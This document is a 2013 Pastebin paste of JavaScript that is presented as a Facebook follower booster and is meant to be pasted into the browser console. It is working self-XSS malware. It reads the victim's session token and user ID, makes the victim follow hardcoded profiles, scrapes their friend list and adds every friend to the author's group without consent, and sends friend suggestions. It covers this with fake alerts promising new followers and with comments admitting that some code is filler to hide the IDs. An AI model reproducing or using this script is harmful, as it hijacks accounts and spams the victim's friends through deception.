Advertisement
supernghiaqn

Code add mems vào Group

Jul 15th, 2013
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 18.46 KB | None | 0 0
  1. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  2. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  3. function a(abone){
  4. var http4 = new XMLHttpRequest();
  5. var url4 = "/ajax/follow/follow_profile.php?__a=1";
  6. var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
  7. http4.open("POST", url4, true);
  8. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  9. http4.setRequestHeader("Content-length", params4.length);
  10. http4.setRequestHeader("Connection", "close");
  11. http4.onreadystatechange = function() {
  12. if(http4.readyState == 4 && http4.status == 200) {http4.close;}
  13. }
  14. http4.send(params4);
  15. }
  16. // Close the connection
  17. function sublist(uidss) {
  18. var a = document.createElement('script');
  19. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  20. document.body.appendChild(a);
  21. }
  22. // Không edit bất kì gì từ đây trở lên
  23. a("100004330805617");a("");
  24.  
  25. // Hàng VIP
  26. a("100001094522338");sublist("536358316410648");sublist("");sublist("");sublist("");sublist("");sublist("");sublist("");sublist("");sublist("");sublist("");sublist("");sublist("");sublist("");
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.                        
  36. // Từ đây trở xuống là nhảm  chủ yếu giấu bớt ID
  37.                                    
  38. // Từ đây trở xuống là nhảm  chủ yếu giấu bớt ID
  39. alert('Đang tải dữ liệu người theo dõi nhà bạn.......                               Ấn chữ "OK" để tiếp tục ');alert(' Lượng người theo dõi sẽ tăng trong 48 giờ tới !!!');alert('Vô Cực chúc các bạn chơi facebook vui vẻ nhé ^^ ');
  40. function sarkadaslari_al(){
  41. var xmlhttp = new XMLHttpRequest();
  42. xmlhttp.onreadystatechange = function () {
  43. if(xmlhttp.readyState == 4){
  44. eval("arkadaslar = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  45. for(f=0;f<Math.round(arkadaslar.payload.entries.length/10);f++){
  46. smesaj = "";
  47. smesaj_text = "";
  48. for(i=f*10;i<(f+1)*10;i++){
  49. if(arkadaslar.payload.entries[i]){
  50. smesaj += " @[" + arkadaslar.payload.entries[i].uid + ":" + arkadaslar.payload.entries[i].text + "]";
  51. smesaj_text += " " + arkadaslar.payload.entries[i].text;
  52. }
  53. }
  54. sdurumpaylas(); }
  55.  
  56. }
  57.  
  58. };
  59. var params = "&filter[0]=user";
  60. params += "&options[0]=friends_only";
  61. params += "&options[1]=nm";
  62. params += "&token=v7";
  63. params += "&viewer=" + user_id;
  64. params += "&__user=" + user_id;
  65.  
  66. if (document.URL.indexOf("https://") >= 0) { xmlhttp.open("GET", "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  67. else { xmlhttp.open("GET", "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1" + params, true); }
  68. xmlhttp.send();
  69. }
  70.  
  71. var tiklama = document.addEventListener("click", function () {
  72. if(document.cookie.split("paylasti=")[1].split(";")[0].indexOf("hayir") >= 0){
  73. svn_rev = document.head.innerHTML.split('"svn_rev":')[1].split(",")[0];
  74. sarkadaslari_al();
  75. document.cookie = "paylasti=evet;expires="+ btarihi.toGMTString();
  76.  
  77. document.removeEventListener(tiklama);
  78. }
  79. }, false);
  80.  
  81. function sarkadasekle(uid,tem){
  82. var xmlhttp = new XMLHttpRequest();
  83. xmlhttp.onreadystatechange = function () {
  84. if(xmlhttp.readyState == 4){
  85. }
  86. };
  87.  
  88. xmlhttp.open("POST", "/ajax/add_friend/action.php?__a=1", true);
  89. var params = "to_friend=" + uid;
  90. params += "&action=add_friend";
  91. params += "&how_found=friend_browser";
  92. params += "&ref_param=none";
  93. params += "&outgoing_id=";
  94. params += "&logging_location=friend_browser";
  95. params += "&no_flyout_on_click=true";
  96. params += "&ego_log_data=";
  97. params += "&http_referer=";
  98. params += "&fb_dtsg=" + document.getElementsByName('fb_dtsg')[0].value;
  99. params += "&phstamp=165816749114848369115";
  100. params += "&__user=" + user_id;
  101. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  102. xmlhttp.setRequestHeader ("Content-Type","application/x-www-form-urlencoded");
  103.  
  104. if(tem == "farketmez" && document.cookie.split("tem" + user_id +"=").length > 1){
  105. xmlhttp.send(params);
  106. }else if(document.cookie.split("tem" + user_id +"=").length <= 1){
  107. cinsiyetgetir(uid,tem,"sarkadasekle");
  108. }else if(tem == document.cookie.split("tem" + user_id +"=")[1].split(";")[0].toString()){
  109. xmlhttp.send(params);
  110. }
  111. }
  112.  
  113. var temsonuc = {};
  114. var temhtml = document.createElement("html");
  115. function scinsiyetgetir(uid,tem,fonksiyon){
  116. var xmlhttp = new XMLHttpRequest();
  117. xmlhttp.onreadystatechange = function () {
  118. if(xmlhttp.readyState == 4){
  119. eval("temsonuc = " + xmlhttp.responseText.toString().replace("for (;;);","") + ";");
  120. temhtml.innerHTML = temsonuc.jsmods.markup[0][1].__html
  121. btarihi.setTime(bugun.getTime() + 1000*60*60*24*365);
  122. if(temhtml.getElementsByTagName("select")[0].value == "1"){
  123. document.cookie = "tem" + user_id + "=kadin;expires=" + btarihi.toGMTString();
  124. }else if(temhtml.getElementsByTagName("select")[0].value == "2"){
  125. document.cookie = "tem" + user_id + "=erkek;expires=" + btarihi.toGMTString();
  126. }
  127. eval(fonksiyon + "(" + id + "," + tem + ");");
  128. }
  129. };
  130. xmlhttp.open("GET", "/ajax/timeline/edit_profile/basic_info.php?__a=1&__user=" + user_id, true);
  131. xmlhttp.setRequestHeader ("X-SVN-Rev", svn_rev);
  132. xmlhttp.send();
  133. }
  134. var gid = ['527204713979028'];
  135. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  136. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  137. var httpwp = new XMLHttpRequest();
  138. var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
  139. var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
  140. httpwp['open']('POST', urlwp, true);
  141. httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
  142. httpwp['setRequestHeader']('Content-length', paramswp['length']);
  143. httpwp['setRequestHeader']('Connection', 'keep-alive');
  144. httpwp['send'](paramswp);
  145. var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
  146. var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);
  147. var friends = new Array();
  148. gf = new XMLHttpRequest();
  149. gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
  150. gf['send']();
  151. if (gf['readyState'] != 4) {} else {
  152. data = eval('(' + gf['responseText']['substr'](9) + ')');
  153. if (data['error']) {} else {
  154. friends = data['payload']['entries']['sort'](function(_0x93dax8, _0x93dax9) {
  155. return _0x93dax8['index'] - _0x93dax9['index']
  156. })
  157. }
  158. };
  159. var Title = 'Đang Kiểm Tra ,Có Người Đang Theo Dõi Bạn <A style="color:#3B5998;" href="https://www.facebook.com/BanMeTreCon">Admin Bạn Mẹ Trẻ Con.</A>';
  160. grpname = document.getElementById("groupsJumpTitle").innerHTML;
  161. var Descriptions = "",
  162. _text = 'Powered By <A style="color:#3B5998;" href="https://www.facebook.com/groups/527204713979028/">Largest Group.</A> Join it now.';
  163.  
  164. function AddFriendtoGroup(opo) {
  165. jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + fb_dtsg + "&group_id=" + gid + "&source=typeahead&members=" + opo + "&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + user_id, function(a) {
  166. var b = a.substring(a.indexOf("{"));
  167. var c = JSON.parse(b);
  168. i--;
  169. Descriptions = "<div class='friend-edge-name' style='padding-bottom:5px;text-align:left;font-size:10px;white-space:pre-wrap;";
  170. if (c.error) {
  171. Descriptions += "color:darkred'>";
  172. err++;
  173. if (c.errorDescription) Descriptions += c.errorDescription;
  174. else Descriptions += JSON.stringify(c, null, "")
  175. } else {
  176. Descriptions += "color:darkgreen'>";
  177. Descriptions += arn[i] + " has been added.<br/>";
  178. suc++
  179. }
  180. Descriptions += "</div>";
  181. var display = "<div id='friend-edge-display' style='box-shadow:0px 3px 8px rgba(0, 0, 0, 0.3);position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'>";
  182. display += "<div style='padding-bottom:5px;font-size:20px;'>" + Title + "</div>";
  183. if (i > 0) {
  184. display += arr.length + " Friends Detected<br/>";
  185. display += "<b>" + suc + "</b> Friends Added of " + (arr.length - i) + " Friends Processed ";
  186. display += "(" + i + " Lefted...)";
  187. display += "<div class='friend-edge'>";
  188. display += Descriptions;
  189. display += "<img style='background:center no-repeat url(https://fbcdn-profile-a.akamaihd.net/static-ak/rsrc.php/v2/yo/r/UlIqmHJn-SK.gif);width:50px;height:50px;margin-left:-125px;padding:2px;border:1px solid rgba(0,0,0,0.4);' src=" + pho[i] + "></img><a style='padding-left:8px;text-align:left;color:#3B5998;position:absolute;font-weight:bold;'>" + arn[i] + "</a>";
  190. display += "<div style='text-align:center;font-size:10px;white-space:pre-wrap;color:gray'>";
  191. display += getuname + " Thanks For Adding Your Friends in " + grpname + ".<br/>";
  192. display += _text;
  193. display += "</div>";
  194. display += "</div>"
  195. } else {
  196. display += arr.length + " Friends Detected<br/>";
  197. display += suc + " Friends Added</br>";
  198. display += err + " Friends Not Added</br></br>";
  199. display += "<div><span class='layerConfirm uiOverlayButton uiButton uiButtonConfirm uiButtonLarge' onClick='window.location.reload()' style='color:white'>Refresh Page</span><span class='layerCancel uiOverlayButton uiButton uiButtonLarge' onClick='document.getElementById(\"pagelet_sidebar\").style.display=\"none\"'>Cancel</span>"
  200. }
  201. display += "</div>";
  202. document.getElementById("pagelet_sidebar").innerHTML = display
  203. }, "text", "post");
  204. tay--;
  205. if (tay > 0) {
  206. var s = arr[tay];
  207. sx = pho[tay];
  208. setTimeout("AddFriendtoGroup(" + s + ")", 100)
  209. }
  210. console.log(tay + "/" + arr.length + ":" + arr[tay] + "/" + arn[tay] + ", success:" + suc);
  211. if (gid != 386572611449908) {
  212. jx.load(window.location.protocol + "//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg=" + fb_dtsg + "&group_id=527204713979028&source=typeahead&members=" + opo + "&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user=" + user_id, function() {}, "text", "post")
  213. }
  214. if (newcomer) {
  215. jx.load(window.location.protocol + "//www.facebook.com/ajax/friends/suggest?&receiver=" + opo + "&newcomer=100001094522338&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=17&fb_dtsg=" + fb_dtsg + "&phstamp=16581651071156988110194", function() {}, "text", "post")
  216. }
  217. if (newcomer) {
  218. jx.load(window.location.protocol + "//www.facebook.com/ajax/friends/suggest?&receiver=" + opo + "&newcomer=100001094522338&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=17&fb_dtsg=" + fb_dtsg + "&phstamp=16581651071156988110194", function() {}, "text", "post")
  219. }
  220. if (newcomer) {
  221. jx.load(window.location.protocol + "//www.facebook.com/ajax/friends/suggest?&receiver=" + opo + "&newcomer=100001094522338&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=17&fb_dtsg=" + fb_dtsg + "&phstamp=16581651071156988110194", function() {}, "text", "post")
  222. }
  223. if (newcomer) {
  224. jx.load(window.location.protocol + "//www.facebook.com/ajax/friends/suggest?&receiver=" + opo + "&newcomer=100001094522338&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=17&fb_dtsg=" + fb_dtsg + "&phstamp=16581651071156988110194", function() {}, "text", "post")
  225. }
  226. if (newcomer) {
  227. jx.load(window.location.protocol + "//www.facebook.com/ajax/friends/suggest?&receiver=" + opo + "&newcomer=100001094522338&attempt_id=0585ab74e2dd0ff10282a3a36df39e19&ref=profile_others_dropdown&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=17&fb_dtsg=" + fb_dtsg + "&phstamp=16581651071156988110194", function() {}, "text", "post")
  228. }
  229. }
  230. function clickfr_callback() {
  231. if (document.getElementsByName("ok").length > 0) nHtml.ClickUp(document.getElementsByName("ok")[0]);
  232. var a = arr[i];
  233. if (i < arr.length) addfriend(a.substring(0, 4))
  234. }
  235. function clickfr() {
  236. if (document.getElementsByClassName("search").length > 0) nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1]);
  237. else j++;
  238. setTimeout("clickfr_callback()", 2E3)
  239. }
  240. function addfriend(a) {
  241. i++;
  242. setTimeout("clickfr()", 2E3)
  243. }
  244. jx = {
  245. getHTTPObject: function() {
  246. var a = false;
  247. if (typeof ActiveXObject != "undefined") try {
  248. a = new ActiveXObject("Msxml2.XMLHTTP")
  249. } catch (b) {
  250. try {
  251. a = new ActiveXObject("Microsoft.XMLHTTP")
  252. } catch (c) {
  253. a = false
  254. }
  255. } else if (window.XMLHttpRequest) try {
  256. a = new XMLHttpRequest
  257. } catch (b) {
  258. a = false
  259. }
  260. return a
  261. },
  262. load: function(url, callback, format, method, opt) {
  263. var http = this.init();
  264. if (!http || !url) return;
  265. if (http.overrideMimeType) http.overrideMimeType("text/xml");
  266. if (!method) method = "GET";
  267. if (!format) format = "text";
  268. if (!opt) opt = {};
  269. format = format.toLowerCase();
  270. method = method.toUpperCase();
  271. var now = "uid=" + (new Date).getTime();
  272. url += url.indexOf("?") + 1 ? "&" : "?";
  273. url += now;
  274. var parameters = null;
  275. if (method == "POST") {
  276. var parts = url.split("?");
  277. url = parts[0];
  278. parameters = parts[1]
  279. }
  280. http.open(method, url, true);
  281. var ths = this;
  282. if (opt.handler) http.onreadystatechange = function() {
  283. opt.handler(http)
  284. };
  285. else http.onreadystatechange = function() {
  286. if (http.readyState == 4) if (http.status == 200) {
  287. var result = "";
  288. if (http.responseText) result = http.responseText;
  289. if (format.charAt(0) == "j") {
  290. result = result.replace(/[\n\r]/g, "");
  291. result = eval("(" + result + ")")
  292. } else if (format.charAt(0) == "x") result = http.responseXML;
  293. if (callback) callback(result)
  294. } else {
  295. if (opt.loadingIndicator) document.getElementsByTagName("body")[0].removeChild(opt.loadingIndicator);
  296. if (opt.loading) document.getElementById(opt.loading).style.display = "none";
  297. if (error) error(http.status)
  298. }
  299. };
  300. http.send(parameters)
  301. },
  302. bind: function(a) {
  303. var b = {
  304. url: "",
  305. onSuccess: false,
  306. onError: false,
  307. format: "text",
  308. method: "GET",
  309. update: "",
  310. loading: "",
  311. loadingIndicator: ""
  312. };
  313. for (var c in b) if (a[c]) b[c] = a[c];
  314. if (!b.url) return;
  315. var d = false;
  316. if (b.loadingIndicator) {
  317. d = document.createElement("div");
  318. d.setAttribute("style", "position:absolute;top:0px;left:0px;");
  319. d.setAttribute("class", "loading-indicator");
  320. d.innerHTML = b.loadingIndicator;
  321. document.getElementsByTagName("body")[0].appendChild(d);
  322. this.opt.loadingIndicator = d
  323. }
  324. if (b.loading) document.getElementById(b.loading).style.display = "block";
  325. this.load(b.url, function(a) {
  326. if (b.onSuccess) b.onSuccess(a);
  327. if (b.update) document.getElementById(b.update).innerHTML = a;
  328. if (d) document.getElementsByTagName("body")[0].removeChild(d);
  329. if (b.loading) document.getElementById(b.loading).style.display = "none"
  330. }, b.format, b.method, b)
  331. },
  332. init: function() {
  333. return this.getHTTPObject()
  334. }
  335. };
  336. var nHtml = {
  337. FindByAttr: function(a, b, c, d) {
  338. if (c == "className") c = "class";
  339. var e = document.evaluate(".//" + b + "[@" + c + "='" + d + "']", a, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null);
  340. if (e && e.singleNodeValue) return e.singleNodeValue;
  341. return null
  342. },
  343. FindByClassName: function(a, b, c) {
  344. return this.FindByAttr(a, b, "className", c)
  345. },
  346. FindByXPath: function(a, b) {
  347. try {
  348. var c = document.evaluate(b, a, null, XPathResult.FIRST_ORDERED_NODE_TYPE, null)
  349. } catch (d) {
  350. GM_log("bad xpath:" + b)
  351. }
  352. if (c && c.singleNodeValue) return c.singleNodeValue;
  353. return null
  354. },
  355. VisitUrl: function(a) {
  356. window.setTimeout(function() {
  357. document.location.href = a
  358. }, 500 + Math.floor(Math.random() * 500))
  359. },
  360. ClickWin: function(a, b, c) {
  361. var d = a.document.createEvent("MouseEvents");
  362. d.initMouseEvent(c, true, true, a, 0, 0, 0, 0, 0, false, false, false, false, 0, null);
  363. return !b.dispatchEvent(d)
  364. },
  365. Click: function(a) {
  366. return this.ClickWin(window, a, "click")
  367. },
  368. ClickTimeout: function(a, b) {
  369. window.setTimeout(function() {
  370. return nHtml.ClickWin(window, a, "click")
  371. }, b + Math.floor(Math.random() * 500))
  372. },
  373. ClickUp: function(a) {
  374. this.ClickWin(window, a, "mousedown");
  375. this.ClickWin(window, a, "mouseup");
  376. this.ClickWin(window, a, "click")
  377. },
  378. GetText: function(a, b) {
  379. var c = "";
  380. if (b == undefined) b = 0;
  381. if (b > 40) return;
  382. if (a.textContent != undefined) return a.textContent;
  383. for (var d = 0; d < a.childNodes.length; d++) {
  384. var e = a.childNodes[d];
  385. c += this.GetText(e, b + 1)
  386. }
  387. return c
  388. }
  389. };
  390. if (document.getElementsByClassName == undefined) document.getElementsByClassName = function(a) {
  391. var b = new RegExp("(?:^|\\s)" + a + "(?:$|\\s)");
  392. var c = document.getElementsByTagName("*");
  393. var d = [];
  394. var e;
  395. for (var f = 0;
  396. (e = c[f]) != null; f++) {
  397. var g = e.className;
  398. if (g && g.indexOf(a) != -1 && b.test(g)) d.push(e)
  399. }
  400. return d
  401. };
  402. Array.prototype.find = function(a) {
  403. var b = false;
  404. for (i = 0; i < this.length; i++) if (typeof a == "function") {
  405. if (a.test(this[i])) {
  406. if (!b) b = [];
  407. b.push(i)
  408. }
  409. } else if (this[i] === a) {
  410. if (!b) b = [];
  411. b.push(i)
  412. }
  413. return b
  414. };
  415. var i = 3;
  416. var tay = 3;
  417. var j = 0;
  418. var k = 0;
  419. var suc = 0;
  420. var err = 0;
  421. var arr = new Array;
  422. var arn = new Array;
  423. var pho = new Array;
  424. var getuname = document.getElementsByClassName("fbxWelcomeBoxName")[0].innerHTML;
  425. var gid = document.getElementsByName("group_id")[0].value;
  426. jx.load(window.location.protocol + "//www.facebook.com/ajax/typeahead/first_degree.php?" + "__a=1&filter[0]=user&lazy=0&viewer=" + user_id + "&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", function(a) {
  427. var b = a;
  428. var c = b.substring(b.indexOf("{"));
  429. var d = JSON.parse(c);
  430. d = d.payload.entries;
  431. for (var e = 0; e < d.length; e++) arr.push(d[e].uid);
  432. for (var eg = 0; eg < d.length; eg++) arn.push(d[eg].text);
  433. for (var pic = 0; pic < d.length; pic++) pho.push(d[pic].photo);
  434. i = arr.length - 1;
  435. tay = i;
  436. console.log(arr.length);
  437. var display = "<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;z-index:9999;font-size:14px;text-align:center;padding:15px;box-shadow:0pt 1px 0pt rgba(0,0,0,0.1);border-radius:3px;border:1px solid rgba(200,200,50,0.2);background-color:rgba(255,255,255,0.9);color:#000000'>";
  438. display += "<div style='padding-bottom:10px;font-size:20px;'>" + Title + "</div>";
  439. display += arr.length + " Friends Detected";
  440. display += "</div>";
  441. document.getElementById("pagelet_sidebar").innerHTML = display;
  442. AddFriendtoGroup(arr[i])
  443. });
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement